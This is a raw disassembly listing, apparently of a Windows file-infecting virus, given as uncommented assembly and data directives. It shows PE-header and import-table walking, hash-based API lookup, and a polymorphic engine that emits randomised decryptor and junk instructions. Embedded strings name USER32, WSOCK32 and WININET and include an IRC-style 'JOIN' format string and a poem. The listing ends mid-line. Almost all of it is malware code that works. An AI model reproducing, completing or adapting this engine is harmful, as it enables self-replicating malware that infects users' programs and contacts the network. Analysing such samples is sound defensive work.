103EB695h dd 0FE7CE800h, 0E8FFFFh, 0FFFFFFF6h, 1012D48Dh, 8DC93300h dd 10431485h, 51515100h, 51515051h, 0B295FF51h, 0E800103Eh dd 0Bh, 52455355h, 442E3233h, 0FF004C4Ch, 103EB695h, 0AE800h dd 73770000h, 6E697270h, 416674h, 5E95FF50h, 8900103Eh dd 103E6685h, 8D310F00h, 1019758Dh, 6C858900h, 5100103Fh dd 3EB695FFh, 68930010h, 4, 1982B58Dh, 8D590010h, 103F52BDh dd 0F5C2E800h, 0C766FFFFh, 101E6585h, 83500000h, 101E67A5h dd 958D0000h, 101E25h, 16A5450h, 6852006Ah, 80000002h dd 3F5695FFh, 0C0850010h, 8D22755Ah, 101E588Dh, 66A5200h dd 1E65B58Dh, 56540010h, 52515050h, 3F5A95FFh, 0FF580010h dd 103F5295h, 7385C600h, 1041h, 0CE8h, 4F535700h, 32334B43h dd 4C4C442Eh, 0B695FF00h, 9300103Eh, 768h, 0D9B58D00h dd 59001018h, 3F22BD8Dh, 3DE80010h, 0E8FFFFF5h, 0Ch, 494E4957h dd 2E54454Eh, 4C4C44h, 3EB695FFh, 0C0850010h, 235840Fh dd 68930000h, 5, 1917B58Dh, 8D590010h, 103F3EBDh, 0F506E800h dd 0BD83FFFFh, 103F42h, 10840F00h, 81000002h, 190ECh, 1685400h dd 0FF000001h, 103F2295h, 90C48100h, 50000001h, 6AD48Bh dd 4295FF52h, 8500103Fh, 0D7559C0h, 138868h, 0D695FF00h dd 0EB00103Eh, 67BD83E2h, 101Eh, 858D2975h, 101E6Bh, 2E95FF50h dd 8500103Fh, 89840FC0h, 8B000001h, 8B0C40h, 858F30FFh dd 101E67h, 417385C6h, 6A010010h, 6A016A00h, 3A95FF02h dd 8300103Fh, 840FFFF8h, 160h, 63958D93h, 6A00101Eh, 0FF535210h dd 103F2A95h, 0FC08500h, 14085h, 84BD8D00h, 0B100101Eh dd 0FA3CE808h, 9468FFFFh, 5E000000h, 3489E62Bh, 95FF5424h dd 103EAEh, 1E92BD8Dh, 1B10010h, 0FFFA1DE8h, 7F958DFFh dd 6A00101Eh, 146800h, 53520000h, 3F3695FFh, 448D0010h dd 958D1424h, 104314h, 0AB60F50h, 1424448Bh, 208E0C1h dd 4A12014Ah, 34A1202h, 824440Bh, 0C10FE180h, 0B5108E0h dd 0FF102444h, 0BD8D5032h, 103F74h, 1CE8h, 362E2500h, 202E2078h dd 253A202Eh, 382E2525h, 20782578h, 4A0A7325h, 204E494Fh dd 95FF5700h, 103E66h, 0ACC481h, 6A0000h, 0FF535750h, 103F3695h dd 888D8B00h, 6A001015h, 6B1BE300h, 0E8510DC9h, 5, 0A642526h dd 95FF5700h, 103E66h, 500CC483h, 7680BEBh, 8D000000h dd 101E98BDh, 0FF535700h, 103F3695h, 7EC08500h, 74B58D54h dd 8300103Fh, 101588A5h, 8D8D0000h, 104173h, 6ACE2Bh, 0FF535651h dd 103F3295h, 0F88300h, 8B912F7Eh, 74B58DFEh, 0B000103Fh dd 75AEF20Dh, 2AE86010h, 61FFFFFAh, 9E31772h, 0EB01778Dh dd 2BCF8BEAh, 74BD8DCEh, 0F300103Fh, 0EBF787A4h, 95FF53B9h dd 103F26h, 156FBD80h, 74010010h, 7530682Ah, 95FF0000h dd 103ED6h, 4173BD80h, 74000010h, 6785C711h, 101Eh, 0C6000000h dd 10417385h, 8E90000h, 0C7FFFFFEh, 10157885h, 0 dd 4C25D80h, 4F0A0D00h, 6F6F6E20h, 666F206Eh, 66696C20h dd 4F202165h, 6D697420h, 6F742065h, 6C656320h, 61726265h dd 0D216574h, 2020200Ah, 204F2020h, 6D6D7573h, 67207265h dd 65647261h, 0A0D216Eh, 656C6552h, 656C746Eh, 796C7373h dd 70616820h, 61207970h, 6520646Eh, 63657078h, 746E6174h dd 7473202Ch, 69646E61h, 203A676Eh, 570A0D2Dh, 68637461h dd 20676E69h, 206C6C61h, 20796164h, 20646E61h, 6867696Eh dd 66202C74h, 6620726Fh, 6E656972h, 49207364h, 69617720h dd 0A0D3A74h, 72656857h, 72612065h, 6F792065h, 66202C75h dd 6E656972h, 203F7364h, 656D6F43h, 74492021h, 20736920h dd 656D6974h, 74492021h, 6C207327h, 21657461h, 4CA2A1A8h dd 6299AD47h, 10A61429h, 0C26CCC5Ch, 606EF96Ah, 1Bh dup(0) ; =============== S U B R O U T I N E ======================================= sub_3143A404 proc near ; CODE XREF: sub_3143A4BA:loc_3143A4A8p ; sub_3143A50B+7p ... arg_0 = dword ptr 4 pusha and dword ptr [ebp+1042E4h], 0 and dword ptr [ebp+1042E8h], 0 movzx eax, word ptr [ebx+14h] lea edx, [ebx+18h] movzx ecx, word ptr [ebx+6] add edx, eax loc_3143A420: ; CODE XREF: sub_3143A404+41j mov eax, [esp+20h+arg_0] sub eax, [edx+0Ch] jb short loc_3143A442 cmp eax, [edx+8] jnb short loc_3143A442 mov eax, [edx+14h] sub eax, [edx+0Ch] mov [ebp+1042E4h], edx mov [ebp+1042E8h], eax jmp short loc_3143A447 ; --------------------------------------------------------------------------- loc_3143A442: ; CODE XREF: sub_3143A404+23j ; sub_3143A404+28j add edx, 28h loop loc_3143A420 loc_3143A447: ; CODE XREF: sub_3143A404+3Cj popa retn 4 sub_3143A404 endp ; --------------------------------------------------------------------------- mov [ebp+102457h], al call sub_3143A4BA push 1Fh lea eax, [ebp+102384h] pop ecx loc_3143A462: ; CODE XREF: UPX2:3143A469j cmp [eax], ebx jz short loc_3143A472 add eax, 4 loop loc_3143A462 inc dword ptr [ebp+1042C0h] retn ; --------------------------------------------------------------------------- loc_3143A472: ; CODE XREF: UPX2:3143A464j neg ecx add ecx, [ebp+102457h] jecxz short loc_3143A48C loc_3143A47C: ; CODE XREF: UPX2:3143A484j push dword ptr [eax-4] pop dword ptr [eax] sub eax, 4 loop loc_3143A47C mov [ebp+102384h], ebx ; START OF FUNCTION CHUNK FOR sub_3143A4BA loc_3143A48C: ; CODE XREF: UPX2:3143A47Aj ; sub_3143A4BA+34j cmp dword ptr [edx], 0 jz short loc_3143A496 sub esi, [edx] add esi, [edx+10h] loc_3143A496: ; CODE XREF: sub_3143A4BA-2Bj lea ecx, [esi-4] pop eax pop ebx pop esi cmp dword ptr [edx], 0 jz short loc_3143A4A5 push dword ptr [edx] jmp short loc_3143A4A8 ; --------------------------------------------------------------------------- loc_3143A4A5: ; CODE XREF: sub_3143A4BA-1Bj push dword ptr [edx+10h] loc_3143A4A8: ; CODE XREF: sub_3143A4BA-17j call sub_3143A404 sub ecx, esi sub ecx, [ebp+1042E8h] pop eax add ecx, [ebx+34h] retn ; END OF FUNCTION CHUNK FOR sub_3143A4BA ; =============== S U B R O U T I N E ======================================= sub_3143A4BA proc near ; CODE XREF: UPX2:3143A451p ; FUNCTION CHUNK AT 3143A48C SIZE 0000002E BYTES pop dword ptr [ebp+1042C4h] mov dword ptr [ebp+1042C0h], 0 call sub_3143A50B mov eax, [ebp+1042C0h] call near ptr dword_31439B40+43h call sub_3143A4F7 cmp dword ptr [ebp+1042C0h], 0 jnz short loc_3143A4F0 mov [ebp+102400h], ebx jmp short loc_3143A48C ; --------------------------------------------------------------------------- loc_3143A4F0: ; CODE XREF: sub_3143A4BA+2Cj dec dword ptr [ebp+1042C0h] retn sub_3143A4BA endp ; sp-analysis failed ; =============== S U B R O U T I N E ======================================= sub_3143A4F7 proc near ; CODE XREF: sub_3143A4BA+20p pop dword ptr [ebp+1042C4h] mov [ebp+1042C0h], edx call sub_3143A50B xor ecx, ecx retn sub_3143A4F7 endp ; sp-analysis failed ; =============== S U B R O U T I N E ======================================= sub_3143A50B proc near ; CODE XREF: sub_3143A4BA+10p ; sub_3143A4F7+Cp ... var_C = dword ptr -0Ch var_4 = dword ptr -4 mov edx, [ebx+80h] push edx call sub_3143A404 add edx, [ebp+1042E8h] add edx, esi loc_3143A51F: ; CODE XREF: sub_3143A50B+120j cmp dword ptr [edx+0Ch], 0 jz locret_3143A630 cmp dword ptr [edx+10h], 0 jz locret_3143A630 mov eax, [edx+0Ch] push eax call sub_3143A404 add eax, [ebp+1042E8h] add eax, esi push eax loc_3143A545: ; CODE XREF: sub_3143A50B+47j mov cl, [eax] cmp cl, 0 jz short loc_3143A565 cmp cl, 2Eh jz short loc_3143A554 loc_3143A551: ; CODE XREF: sub_3143A50B+58j inc eax jmp short loc_3143A545 ; --------------------------------------------------------------------------- loc_3143A554: ; CODE XREF: sub_3143A50B+44j mov ecx, [eax+1] and ecx, 0DFDFDFDFh cmp ecx, 4C4C44h jnz short loc_3143A551 loc_3143A565: ; CODE XREF: sub_3143A50B+3Fj pop ecx sub ecx, eax cmp ecx, 0FFFFFFFAh jg loc_3143A628 cmp word ptr [eax-2], 3233h jnz loc_3143A628 push esi cmp dword ptr [edx], 0 jnz short loc_3143A588 mov ecx, [edx+10h] jmp short loc_3143A58A ; --------------------------------------------------------------------------- loc_3143A588: ; CODE XREF: sub_3143A50B+76j mov ecx, [edx] loc_3143A58A: ; CODE XREF: sub_3143A50B+7Bj add esi, ecx push ecx call sub_3143A404 add esi, [ebp+1042E8h] loc_3143A598: ; CODE XREF: sub_3143A50B+90j ; sub_3143A50B+117j lodsd test eax, eax js short loc_3143A598 jz loc_3143A627 push dword ptr [ebp+1042E8h] push eax call sub_3143A404 add eax, [ebp+1042E8h] pop dword ptr [ebp+1042E8h] add eax, [esp+4+var_4] push ebx add eax, 2 xor ebx, ebx loc_3143A5C4: ; CODE XREF: sub_3143A50B+CEj movzx ecx, byte ptr [eax] jecxz short loc_3143A5DB or cl, 20h push ebx shl [esp+0Ch+var_C], 4 sub [esp+0Ch+var_C], ebx sub [esp+0Ch+var_C], ecx pop ebx inc eax jmp short loc_3143A5C4 ; --------------------------------------------------------------------------- loc_3143A5DB: ; CODE XREF: sub_3143A50B+BCj cmp ebx, 0DDBBD70Fh jz short loc_3143A621 cmp ebx, 0DB6E45A8h jz short loc_3143A621 cmp ebx, 0FFA13B59h jz short loc_3143A621 cmp ebx, 0ACB522D6h jz short loc_3143A621 cmp ebx, 0F358E993h jz short loc_3143A621 cmp ebx, 0F358E97Dh jz short loc_3143A621 cmp ebx, 0E1253F46h jz short loc_3143A621 cmp ebx, 0E1253F30h jz short loc_3143A621 call dword ptr [ebp+1042C4h] loc_3143A621: ; CODE XREF: sub_3143A50B+D6j ; sub_3143A50B+DEj ... pop ebx jmp loc_3143A598 ; --------------------------------------------------------------------------- loc_3143A627: ; CODE XREF: sub_3143A50B+92j pop esi loc_3143A628: ; CODE XREF: sub_3143A50B+60j ; sub_3143A50B+6Cj add edx, 14h jmp loc_3143A51F ; --------------------------------------------------------------------------- locret_3143A630: ; CODE XREF: sub_3143A50B+18j ; sub_3143A50B+22j retn sub_3143A50B endp ; --------------------------------------------------------------------------- db 1, 6Ah, 4 dd 0F549E858h, 9588FFFFh, 102631h, 1831B866h, 0E4C0E202h dd 66E20203h, 58066AABh, 0FFF52EE8h, 8C283FFh, 56AD187h dd 0F521E858h, 0FA80FFFFh, 0B00B7303h, 31850250h, 0AA001026h dd 686A27EBh, 0FA80AA58h, 0B0187503h, 0F501E811h, 1B8FFFFh dd 84000000h, 0D10D74D2h, 0EBCAFEE0h, 0B805EBF6h, 80000000h dd 0C3BFE2ABh, 39BC958Dh, 0D72B0010h, 0F7C3DAF7h, 1039B085h dd 0 ; --------------------------------------------------------------------------- adc [edi], cl xchg eax, ebp rol cl, 0E0h or esi, esi test [esi+1001039h], ebp jnz short loc_3143A6C6 or ax, 2589h jmp short loc_3143A6D9 ; --------------------------------------------------------------------------- loc_3143A6C6: ; CODE XREF: UPX2:3143A6BEj test byte ptr [ebp+1039AEh], 2 jnz short loc_3143A6D5 or ax, 2531h jmp short loc_3143A6D9 ; --------------------------------------------------------------------------- loc_3143A6D5: ; CODE XREF: UPX2:3143A6CDj or ax, 2501h loc_3143A6D9: ; CODE XREF: UPX2:3143A6C4j ; UPX2:3143A6D3j stosw call near ptr dword_3143A634+68h mov eax, [ebx+34h] mov [ebp+1042D8h], edx stosd retn ; =============== S U B R O U T I N E ======================================= sub_3143A6EB proc near ; CODE XREF: UPX2:3143AD37p test dword ptr [ebp+1039B0h], 10000000h setnz al add al, 0BCh stosb call near ptr dword_3143A634+68h mov [ebp+1042DCh], edx test byte ptr [ebp+1039AEh], 1 jnz short loc_3143A713 rdtsc jmp short loc_3143A715 ; --------------------------------------------------------------------------- loc_3143A713: ; CODE XREF: sub_3143A6EB+22j sub eax, eax loc_3143A715: ; CODE XREF: sub_3143A6EB+26j stosd retn sub_3143A6EB endp ; =============== S U B R O U T I N E ======================================= sub_3143A717 proc near ; CODE XREF: UPX2:loc_3143AD41p test dword ptr [ebp+1039B0h], 10000000h jz short loc_3143A74A mov al, [ebp+1039AAh] shl eax, 0Bh or ax, 458Bh stosw mov al, 0F8h stosb mov al, [ebp+1039AAh] shl eax, 1Bh add eax, 6896467h stosd xor eax, eax stosw jmp short locret_3143A75C ; --------------------------------------------------------------------------- loc_3143A74A: ; CODE XREF: sub_3143A717+Aj mov eax, 58F64h stosd mov al, [ebp+1039AAh] add al, 58h shl eax, 18h stosd locret_3143A75C: ; CODE XREF: sub_3143A717+31j retn sub_3143A717 endp ; =============== S U B R O U T I N E ======================================= sub_3143A75D proc near ; CODE XREF: sub_3143A7CF:loc_3143A7F6p ; sub_3143A7CF+4Cp ... mov byte ptr [ebp+10278Ch], 9 jmp short loc_3143A78B ; --------------------------------------------------------------------------- loc_3143A766: ; CODE XREF: sub_3143A75D+44j mov al, 0FCh jmp short loc_3143A78A ; --------------------------------------------------------------------------- loc_3143A76A: ; CODE XREF: sub_3143A75D+48j mov ax, 0EBh stosw jmp short loc_3143A78B ; --------------------------------------------------------------------------- loc_3143A772: ; CODE XREF: sub_3143A75D+4Cj push 4 pop eax call near ptr dword_31439B40+43h lea eax, [edx+edx*8] shl eax, 8 add ax, 0C089h stosw jmp short loc_3143A78B ; --------------------------------------------------------------------------- loc_3143A788: ; CODE XREF: sub_3143A75D+50j mov al, 90h loc_3143A78A: ; CODE XREF: sub_3143A75D+Bj ; sub_3143A75D+60j ... stosb loc_3143A78B: ; CODE XREF: sub_3143A75D+7j ; sub_3143A75D+13j ... push 1Bh pop eax call near ptr dword_31439B40+43h add byte ptr [ebp+10278Ch], 6 cmp dl, 8 jnb short locret_3143A7CE test dl, dl jz short loc_3143A766 dec dl jz short loc_3143A76A dec dl jz short loc_3143A772 dec dl jz short loc_3143A788 dec dl jz short loc_3143A7BF dec dl jz short loc_3143A7C6 dec dl jz short loc_3143A7CA mov al, 0F9h jmp short loc_3143A78A ; --------------------------------------------------------------------------- loc_3143A7BF: ; CODE XREF: sub_3143A75D+54j mov al, 87h stosb mov al, 0DBh jmp short loc_3143A78A ; --------------------------------------------------------------------------- loc_3143A7C6: ; CODE XREF: sub_3143A75D+58j mov al, 0F5h jmp short loc_3143A78A ; --------------------------------------------------------------------------- loc_3143A7CA: ; CODE XREF: sub_3143A75D+5Cj mov al, 0F8h jmp short loc_3143A78A ; --------------------------------------------------------------------------- locret_3143A7CE: ; CODE XREF: sub_3143A75D+40j retn sub_3143A75D endp ; =============== S U B R O U T I N E ======================================= sub_3143A7CF proc near ; CODE XREF: UPX2:loc_3143AC18p ; UPX2:3143ADCBp test dword ptr [ebp+1039B0h], 2000h mov al, 86h jnz short loc_3143A7DF add al, 4 loc_3143A7DF: ; CODE XREF: sub_3143A7CF+Cj lea ecx, [edi-2] mov ah, [ebp+1039A8h] stosw cmp ah, 5 jnz short loc_3143A7F6 mov al, 0 or byte ptr [edi-1], 40h stosb loc_3143A7F6: ; CODE XREF: sub_3143A7CF+1Ej call sub_3143A75D test dword ptr [ebp+1039B0h], 4000h mov ax, 3166h jnz short loc_3143A80D mov ah, 29h loc_3143A80D: ; CODE XREF: sub_3143A7CF+3Aj stosw mov al, 18h or al, [ebp+1039AAh] shl al, 3 stosb call sub_3143A75D mov al, 88h test dword ptr [ebp+1039B0h], 8000h jnz short loc_3143A830 mov al, 86h loc_3143A830: ; CODE XREF: sub_3143A7CF+5Dj mov ah, [ebp+1039A8h] stosw cmp ah, 5 jnz short locret_3143A844 mov al, 0 or byte ptr [edi-1], 40h stosb locret_3143A844: ; CODE XREF: sub_3143A7CF+6Cj retn sub_3143A7CF endp ; --------------------------------------------------------------------------- loc_3143A845: ; CODE XREF: sub_3143B44B+183p lea edi, [ebp+1039BCh] call sub_3143A75D test dword ptr [ebp+1039B0h], 400000h jz short near ptr unk_3143A85F mov al, 60h stosb ; --------------------------------------------------------------------------- unk_3143A85F db 0F7h ; ; CODE XREF: UPX2:3143A85Aj db 85h ; db 0B0h ; db 39h ; 9 db 10h db 0 db 0 db 0 db 0 ; --------------------------------------------------------------------------- adc [edi+eax-48h], dh push ebp mov ebp, esp add [ebx-4F7A08B1h], ch cmp [eax], edx add [ebx], al ; --------------------------------------------------------------------------- db 2 dup(0), 2 dd 0F0840Fh, 0E8B00000h, 0BD89ABAAh, 1042C8h, 0FFFECCE8h dd 0AAE8B0FFh, 0CCBD89ABh, 0E8001042h, 0FFFFFEBDh, 39B085F7h dd 30010h, 1A740000h, 39B085F7h, 10h, 0A740200h, 0FFFE2EE8h dd 0FE9BE8FFh, 0E9B0FFFFh, 858BABAAh, 1042C8h, 0C82BCF8Bh dd 42D0BD89h, 48890010h, 6467B8FCh, 33AB36FFh, 0F7AB66C0h dd 1039B085h, 300h, 0F6137400h, 1039AE85h, 0A748000h, 0FFFDAAE8h dd 0FE5BE8FFh, 67B8FFFFh, 0AB268964h, 0AB66C033h, 39B085F7h dd 30010h, 5A740000h, 39AE85F6h, 75800010h, 0FD81E80Ah dd 32E8FFFFh, 0E8FFFFFEh, 0FFFFFD02h, 14E820B0h, 0E3FFFFFBh dd 0FFB86639h, 91AB6615h, 0B0958BABh, 0F7001039h, 3C2F7D2h dd 75000000h, 0FCDCE814h, 1FB0FFFFh, 0FFFAEEE8h, 0FFB866FFh dd 91AB6615h, 8BCF8BABh, 1042D085h, 89C82B00h, 85F7FC48h dd 1039B0h, 3, 85F73874h, 1039B0h, 0C000000h, 85F72C74h dd 1039B0h, 2000000h, 0C2E80A75h, 0E8FFFFFDh, 0FFFFFD4Bh dd 39B085F7h, 10h, 0A740800h, 0FFFDACE8h, 0FD61E8FFh, 85F7FFFFh dd 1039B0h, 4, 96E81774h, 0B8FFFFFDh, 0C8FEC029h, 0C008B8ABh dd 0B8AB0474h, 67EBF875h, 0FD7FE8ABh, 85F7FFFFh, 1039B0h dd 8, 0BD807275h, 1039AEh, 0E8697400h, 0FFFFFD65h, 291829B8h dd 0AAA50AC9h, 0C0001039h, 0A50A03E4h, 1039AAh, 0FD4BE8ABh dd 0B1B0FFFFh, 0AE858AAAh, 0AA001039h, 0FFFD3CE8h, 85B60FFFh dd 1039AAh, 4C0048Dh, 8E0C140h, 0AB668DB0h, 57AA01B0h dd 0FFFD20E8h, 243C29FFh, 0FBE2B866h, 0B085F759h, 10001039h dd 74000000h, 0AA49B007h, 0FA75B866h, 0AB66E102h, 0FFFCFCE8h dd 0AAE8B0FFh, 89ABC033h, 1042B4BDh, 0B085F700h, 20001039h dd 75000000h, 0DEE8573Bh, 0F7FFFFFCh, 1039B085h, 0 dd 89187480h, 1042E0BDh, 0FD39E800h, 0C2E8FFFFh, 0B0FFFFFCh dd 0BAE8AAC3h, 5AFFFFFCh, 58B0CF8Bh, 850ACA2Bh, 1039A8h dd 0AAFC4A89h, 0FFFCA4E8h, 81B866FFh, 0B085F7C0h, 40001039h dd 74000000h, 28C48003h, 39A8A50Ah, 0AB660010h, 42B8BD89h dd 0F7AB0010h, 1039B085h, 0 ; --------------------------------------------------------------------------- inc eax jnz short loc_3143AAF0 mov al, 50h add al, [ebp+1039A8h] stosb loc_3143AAF0: ; CODE XREF: UPX2:3143AAE5j test dword ptr [ebp+1039B0h], 80h jnz short loc_3143AB07 mov al, 0B8h or al, [ebp+1039A9h] stosb jmp short loc_3143AB44 ; --------------------------------------------------------------------------- loc_3143AB07: ; CODE XREF: UPX2:3143AAFAj mov ax, 1831h test dword ptr [ebp+1039B0h], 100h jz short loc_3143AB19 mov al, 29h loc_3143AB19: ; CODE XREF: UPX2:3143AB15j or ah, [ebp+1039A9h] shl ah, 3 or ah, [ebp+1039A9h] stosw mov ax, 0F081h test dword ptr [ebp+1039B0h], 200h jnz short loc_3143AB3C mov ah, 0C8h loc_3143AB3C: ; CODE XREF: UPX2:3143AB38j or ah, [ebp+1039A9h] stosw loc_3143AB44: ; CODE XREF: UPX2:3143AB05j mov [ebp+1042D4h], edi mov eax, 29BCh stosd test dword ptr [ebp+1039B0h], 8 jz short loc_3143ABCD call sub_3143A75D test dword ptr [ebp+1039B0h], 400h jnz short loc_3143AB78 mov al, 0B8h or al, [ebp+1039AAh] stosb jmp short loc_3143ABC5 ; --------------------------------------------------------------------------- loc_3143AB78: ; CODE XREF: UPX2:3143AB6Bj test dword ptr [ebp+1039B0h], 800h jnz short loc_3143AB95 mov ax, 0E083h or ah, [ebp+1039AAh] stosw xor eax, eax stosb jmp short loc_3143ABAA ; --------------------------------------------------------------------------- loc_3143AB95: ; CODE XREF: UPX2:3143AB82j mov ax, 1829h or ah, [ebp+1039AAh] shl ah, 3 or ah, [ebp+1039AAh] stosw loc_3143ABAA: ; CODE XREF: UPX2:3143AB93j test dword ptr [ebp+1039B0h], 1000h mov ax, 0C081h jz short loc_3143ABBD add ah, 8 loc_3143ABBD: ; CODE XREF: UPX2:3143ABB8j or ah, [ebp+1039AAh] stosw loc_3143ABC5: ; CODE XREF: UPX2:3143AB76j movzx eax, byte ptr [ebp+1039AEh] stosd loc_3143ABCD: ; CODE XREF: UPX2:3143AB5Aj call sub_3143A75D test dword ptr [ebp+1039B0h], 40000000h jz short loc_3143ABEC mov al, 50h add al, [ebp+1039A8h] stosb call sub_3143A75D loc_3143ABEC: ; CODE XREF: UPX2:3143ABDCj lea ecx, [edi-2] mov [ebp+1042BCh], ecx test dword ptr [ebp+1039B0h], 80000000h jz short loc_3143AC18 mov al, 0E8h stosb mov eax, [ebp+1042E0h] sub eax, edi sub eax, 4 stosd mov [ebp+1042E0h], edi jmp short loc_3143AC1D ; --------------------------------------------------------------------------- loc_3143AC18: ; CODE XREF: UPX2:3143ABFFj call sub_3143A7CF loc_3143AC1D: ; CODE XREF: UPX2:3143AC16j call sub_3143A75D test dword ptr [ebp+1039B0h], 10000h jnz short loc_3143AC39 mov al, 40h or al, [ebp+1039A8h] stosb jmp short loc_3143AC48 ; --------------------------------------------------------------------------- loc_3143AC39: ; CODE XREF: UPX2:3143AC2Cj mov ax, 0C083h or ah, [ebp+1039A8h] stosw mov al, 1 stosb loc_3143AC48: ; CODE XREF: UPX2:3143AC37j test dword ptr [ebp+1039B0h], 20000h jnz short loc_3143AC83 test dword ptr [ebp+1039B0h], 40000h jnz short loc_3143AC7A mov al, 0C0h or al, [ebp+1039AAh] mov ah, [ebp+1039AFh] shl eax, 10h mov ax, 8166h stosd mov al, 0 jmp short loc_3143AC82 ; --------------------------------------------------------------------------- loc_3143AC7A: ; CODE XREF: UPX2:3143AC5Ej mov al, 40h or al, [ebp+1039AAh] loc_3143AC82: ; CODE XREF: UPX2:3143AC78j stosb loc_3143AC83: ; CODE XREF: UPX2:3143AC52j test dword ptr [ebp+1039B0h], 80000h jnz short loc_3143AC9F mov ax, 0E883h or ah, [ebp+1039A9h] stosw mov al, 1 jmp short loc_3143ACA7 ; --------------------------------------------------------------------------- loc_3143AC9F: ; CODE XREF: UPX2:3143AC8Dj mov al, 48h or al, [ebp+1039A9h] loc_3143ACA7: ; CODE XREF: UPX2:3143AC9Dj stosb call sub_3143A75D test dword ptr [ebp+1039B0h], 100000h mov cl, 75h jnz short loc_3143ACE0 mov ax, 0F883h or ah, [ebp+1039A9h] stosw xor eax, eax stosb sub [ebp+1042BCh], edi test dword ptr [ebp+1039B0h], 200000h jnz short loc_3143ACFB mov cl, 77h jmp short loc_3143ACFB ; --------------------------------------------------------------------------- loc_3143ACE0: ; CODE XREF: UPX2:3143ACB9j mov ax, 1809h or ah, [ebp+1039A9h] shl ah, 3 or ah, [ebp+1039A9h] stosw sub [ebp+1042BCh], edi loc_3143ACFB: ; CODE XREF: UPX2:3143ACDAj ; UPX2:3143ACDEj mov al, cl mov ah, [ebp+1042BCh] stosw mov al, 58h add al, [ebp+1039A8h] stosb call sub_3143A75D test dword ptr [ebp+1039B0h], 2000003h jz short loc_3143AD4B test dword ptr [ebp+1039B0h], 8000000h jnz short loc_3143AD4B test dword ptr [ebp+1039B0h], 6000000h jnz short loc_3143AD41 call sub_3143A6EB call sub_3143A75D loc_3143AD41: ; CODE XREF: UPX2:3143AD35j call sub_3143A717 call sub_3143A75D loc_3143AD4B: ; CODE XREF: UPX2:3143AD1Dj ; UPX2:3143AD29j test dword ptr [ebp+1039B0h], 10000000h jz short loc_3143AD5F mov al, 0C9h stosb call sub_3143A75D loc_3143AD5F: ; CODE XREF: UPX2:3143AD55j test dword ptr [ebp+1039B0h], 400000h jz short loc_3143AD95 mov al, 7 sub al, [ebp+1039A8h] shl eax, 1Ah or eax, 240889h add ah, [ebp+1039A8h] shl ah, 3 add ah, 4 stosd call sub_3143A75D mov al, 61h stosb call sub_3143A75D loc_3143AD95: ; CODE XREF: UPX2:3143AD69j mov ax, 0E0FFh or ah, [ebp+1039A8h] stosw call sub_3143A75D test dword ptr [ebp+1039B0h], 20h jz short loc_3143AE21 test dword ptr [ebp+1039B0h], 80000000h jz short loc_3143ADDD mov eax, edi mov ecx, [ebp+1042E0h] sub eax, ecx mov [ecx-4], eax call sub_3143A7CF call sub_3143A75D mov al, 0C3h stosb call sub_3143A75D loc_3143ADDD: ; CODE XREF: UPX2:3143ADBCj mov eax, edi mov ecx, [ebp+1042B4h] sub eax, ecx mov [ecx-4], eax mov al, 58h or al, [ebp+1039A8h] stosb call sub_3143A75D test dword ptr [ebp+1039B0h], 800000h jz short loc_3143AE10 mov ax, 0C350h or al, [ebp+1039A8h] jmp short loc_3143AE1A ; --------------------------------------------------------------------------- loc_3143AE10: ; CODE XREF: UPX2:3143AE02j mov ax, 0E0FFh or ah, [ebp+1039A8h] loc_3143AE1A: ; CODE XREF: UPX2:3143AE0Ej stosw call sub_3143A75D loc_3143AE21: ; CODE XREF: UPX2:3143ADB0j test dword ptr [ebp+1039B0h], 2000003h jz short loc_3143AE8C mov ecx, edi mov eax, [ebp+1042CCh] sub ecx, eax mov [eax-4], ecx xor ecx, ecx test dword ptr [ebp+1039B0h], 1000000h jnz short loc_3143AE56 lea eax, [ebp+1039A8h] loc_3143AE4E: ; CODE XREF: UPX2:3143AE54j mov cl, [eax] inc eax cmp cl, 3 jnb short loc_3143AE4E loc_3143AE56: ; CODE XREF: UPX2:3143AE46j lea eax, ds:102444h[ecx*8] shl eax, 8 mov al, 8Bh stosd jecxz short loc_3143AE6B mov ax, 0C031h stosw loc_3143AE6B: ; CODE XREF: UPX2:3143AE63j mov ax, 808Fh push 0B8h add ah, cl stosw pop eax stosd test ecx, ecx jnz short loc_3143AE84 mov ax, 0C031h stosw loc_3143AE84: ; CODE XREF: UPX2:3143AE7Cj mov al, 0C3h stosb call sub_3143A75D loc_3143AE8C: ; CODE XREF: UPX2:3143AE2Bj lea eax, [ebp+1039BCh] test dword ptr [ebp+1039B0h], 20000000h jnz short loc_3143AEA4 push edi sub edi, eax pop eax jmp short loc_3143AEBD ; --------------------------------------------------------------------------- loc_3143AEA4: ; CODE XREF: UPX2:3143AE9Cj mov edx, [ebx+28h] sub edi, eax sub edx, eax mov ecx, [ebp+1042D4h] add [ebp+1042B4h], edx add [ecx], edi mov eax, [esp+4] loc_3143AEBD: ; CODE XREF: UPX2:3143AEA2j mov [ebp+101069h], edi mov edi, [ebp+1042B8h] sub eax, [ebp+1042B4h] test dword ptr [ebp+1039B0h], 40h jz short loc_3143AEDD neg eax loc_3143AEDD: ; CODE XREF: UPX2:3143AED9j stosd retn 4 ; =============== S U B R O U T I N E ======================================= sub_3143AEE1 proc near ; CODE XREF: sub_3143B44B+336p push esi push edi cmp dword ptr [ebp+1042F0h], 0 jz loc_3143B0C9 call near ptr loc_3143AF01+1 dec ebx inc ebp push edx dec esi inc ebp dec esp xor esi, [edx] db 2Eh inc esp dec esp dec esp loc_3143AF01: ; CODE XREF: sub_3143AEE1+Fp add bh, bh sub_3143AEE1 endp ; sp-analysis failed xchg eax, ebp sahf db 3Eh adc [eax], al mov [ebp+104304h], eax push ebx mov ebx, [eax+3Ch] add ebx, eax push dword ptr [ebx+28h] mov eax, [ebx+34h] call sub_3143A404 mov edx, [ebp+1042E4h] pop ebx add eax, [edx+0Ch] mov [ebp+104308h], eax add eax, [edx+8] mov [ebp+10430Ch], eax mov esi, [ebx+28h] push dword ptr [ebx+80h] call sub_3143A404 mov edi, [ebp+1042E4h] push esi call sub_3143A404 mov edx, [ebp+1042E4h] mov ecx, [edx+8] add ecx, [edx+0Ch] sub ecx, esi sub ecx, 5 js loc_3143B0C9 jz loc_3143B0C9 add esi, [ebp+1042E8h] add esi, [ebp+1042A4h] ; START OF FUNCTION CHUNK FOR sub_3143B09A loc_3143AF7B: ; CODE XREF: sub_3143B09A+29j lodsb cmp al, 0E8h jnz loc_3143B026 lea eax, [esi+4] sub eax, [ebp+1042A4h] add eax, [esi] push eax call sub_3143A404 cmp dword ptr [ebp+1042E4h], 0 jnz short loc_3143AFA9 cmp eax, [edi+0Ch] jnb loc_3143B0C2 jmp short loc_3143AFB5 ; --------------------------------------------------------------------------- loc_3143AFA9: ; CODE XREF: sub_3143B09A-FEj cmp [ebp+1042E4h], edx jnz loc_3143B0C2 loc_3143AFB5: ; CODE XREF: 